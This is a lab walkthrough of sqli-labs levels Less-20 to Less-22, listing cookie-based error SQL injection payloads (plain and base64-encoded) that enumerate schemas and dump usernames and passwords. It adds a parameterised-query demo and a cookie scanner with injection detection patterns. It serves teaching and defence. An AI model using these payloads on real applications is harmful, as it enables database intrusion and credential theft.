Cookie
Cookie injection differs slightly from the other header injections.
Cookie: when the browser sends a request to the server it sends its cookies along, and when the server sets a cookie for the browser it is attached here as well. For example: Cookie:user=admin
In the source code, if a Cookie is set, the statement below is executed:
Otherwise it is not executed:
Less-20
Log in with an account, then use Hackbar's LOAD command or capture the request with Burp Suite.
Closing characters: '$cookee'
Query the current database:
Dumb' or extractvalue(1,concat(0x7e,database())) #
# uname=Dumb: the value here can be anything; it does not affect extractvalue()
Query the tables in the current database:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
Query the columns of the current table:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
Query the data:
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
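To show the defensive side of Less-20, here is an added Python example that is not part of this writeup or of sqli-labs. It contrasts the concatenated query behind the '$cookee' closing with a parameterised one, using an in-memory SQLite stand-in for the security.users table filled with constructed rows. SQLite has no extractvalue(), so the point demonstrated is narrower than in MySQL: on the vulnerable path the cookie value reaches the SQL parser and produces a database error that the application echoes, while the parameterised path treats the identical cookie value as plain data and simply matches no user.

```python
import sqlite3

# Cookie value taken from the Less-20 steps above (the '$cookee' closing)
LESS20_PAYLOAD = "Dumb' or extractvalue(1,concat(0x7e,database())) #"


def build_db():
    """Constructed in-memory stand-in for sqli-labs' security.users; rows are sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dumb", "Dumb"), ("admin", "constructed-secret")],
    )
    conn.commit()
    return conn


def vulnerable_sql(cookie_uname):
    """String concatenation: the cookie lands inside the quotes, so a quote in it ends the literal."""
    return f"SELECT username, password FROM users WHERE username='{cookie_uname}' LIMIT 1"


def vulnerable_lookup(conn, cookie_uname):
    """Runs the concatenated query and, like sqli-labs, hands the raw DB error back to the client."""
    try:
        return conn.execute(vulnerable_sql(cookie_uname)).fetchone()
    except sqlite3.Error as exc:
        # Echoing the error text is what error-based extraction relies on
        return ("DB_ERROR", str(exc))


def safe_lookup(conn, cookie_uname):
    """Parameterised query: the driver binds the value, so quotes and keywords in it are just data."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username = ? LIMIT 1", (cookie_uname,)
    ).fetchone()


def compare(cookie_uname):
    """Run the same cookie value through both code paths on a fresh database."""
    conn = build_db()
    return {
        "vulnerable": vulnerable_lookup(conn, cookie_uname),
        "safe": safe_lookup(conn, cookie_uname),
    }


if __name__ == "__main__":
    print("built query:", vulnerable_sql(LESS20_PAYLOAD))
    for label, result in compare(LESS20_PAYLOAD).items():
        print(f"{label:10}:", result)
```

The fix is the bound parameter, not input filtering: the legitimate value Dumb still resolves on both paths, and the parameterised path never needs to know what the cookie contains.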
Less-21
base64_decode() is applied, so the cookie is base64-decoded.
Log in with an account, then use Hackbar's LOAD command. Take the cookie value from the page, URL-decode the %3D first, then base64-decode it; the result is Dumb.
Closing characters: ('$uname')
Query the current database:
Dumb') or extractvalue(1,concat(0x7e,database())) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj
Query the tables in the current database:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj
Query the columns of the current table:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==
Query the data:
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64:
Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj
dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=
Less-22
The closing characters change.
Log in with an account, then use Hackbar's LOAD command or capture the request with Burp Suite. The cookie is RHVtYg%3D%3D, where = is URL-encoded as %3D; decoded it is Dumb.
Here it jumps back to Less-21; the file name in the address bar changes to Less-22.
Closing characters: "$cookee1"
Query the current database:
Dumb" or extractvalue(1,concat(0x7e,database())) #
base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==
Query the tables in the current database:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==
Query the columns of the current table:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj
Query the data:
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64:
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==
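Less-21 and Less-22 carry the same payloads as Less-20 but hidden behind base64 and URL encoding, so a detection that only inspects the raw Cookie header misses them. The following Python is an added example, not from this writeup, that normalises each cookie value the way those levels' backends do (URL-decode, then base64-decode when the value decodes cleanly to printable text) before matching a small, illustrative set of error-based injection indicators. The sample Cookie headers are constructed in the code and the pattern list is an assumption, not a complete ruleset.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Illustrative indicators of the error-based technique in Less-20..22 (assumed list, not a full ruleset)
SQLI_PATTERNS = [
    r"""['")]\s*(or|and)\b""",              # closing quote/paren followed by a boolean operator
    r"\b(extractvalue|updatexml)\s*\(",     # MySQL XML functions whose error text leaks data
    r"\binformation_schema\.",              # schema enumeration
    r"\bgroup_concat\s*\(",
    r"\bunion\s+(all\s+)?select\b",
]
COMPILED = [re.compile(p, re.IGNORECASE) for p in SQLI_PATTERNS]


def parse_cookie_header(header):
    """Split 'Cookie: a=b; c=d' into {'a': 'b', 'c': 'd'} with values left URL-encoded."""
    body = header.split(":", 1)[1] if header.lower().startswith("cookie:") else header
    cookies = {}
    for part in body.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def decode_candidates(raw_value):
    """Return the plaintexts a Less-21 style backend could see: URL-decoded, plus base64-decoded if valid."""
    url_decoded = unquote(raw_value)
    candidates = [url_decoded]
    try:
        decoded = base64.b64decode(url_decoded, validate=True).decode("utf-8")
        if decoded.isprintable():
            candidates.append(decoded)
    except (binascii.Error, UnicodeDecodeError, ValueError):
        pass  # not base64 text: only the URL-decoded form is inspected
    return candidates


def scan_cookie_header(header):
    """Return [(cookie_name, matched_pattern, decoded_value)] for every suspicious cookie value."""
    findings = []
    for name, raw in parse_cookie_header(header).items():
        for candidate in decode_candidates(raw):
            for pattern in COMPILED:
                if pattern.search(candidate):
                    findings.append((name, pattern.pattern, candidate))
                    break
    return findings


def b64_cookie(plain):
    """Encode a value the way Less-21/22 expect it: base64, then URL-encoded ('=' becomes %3D)."""
    return quote(base64.b64encode(plain.encode()).decode())


# Constructed sample headers (not captured traffic); the payload string is the one from Less-21 above
LESS21_PAYLOAD = "Dumb') or extractvalue(1,concat(0x7e,database())) #"
SAMPLE_HEADERS = [
    "Cookie: uname=Dumb",
    "Cookie: uname=" + b64_cookie("Dumb"),          # RHVtYg%3D%3D, the benign Less-21 cookie
    "Cookie: uname=Dumb' or extractvalue(1,concat(0x7e,database())) #",
    "Cookie: uname=" + b64_cookie(LESS21_PAYLOAD),  # the same technique hidden behind base64
]


def scan_all(headers=SAMPLE_HEADERS):
    """Map each header to its findings; an empty list means nothing matched after decoding."""
    return {h: scan_cookie_header(h) for h in headers}


if __name__ == "__main__":
    for header, hits in scan_all().items():
        print(header[:60], "->", "suspicious" if hits else "clean", hits)
```

The base64 decode is attempted opportunistically and kept only when the result is printable text, which is what keeps the benign RHVtYg%3D%3D cookie and an ordinary value like Dumb from producing false positives while still surfacing the encoded payload.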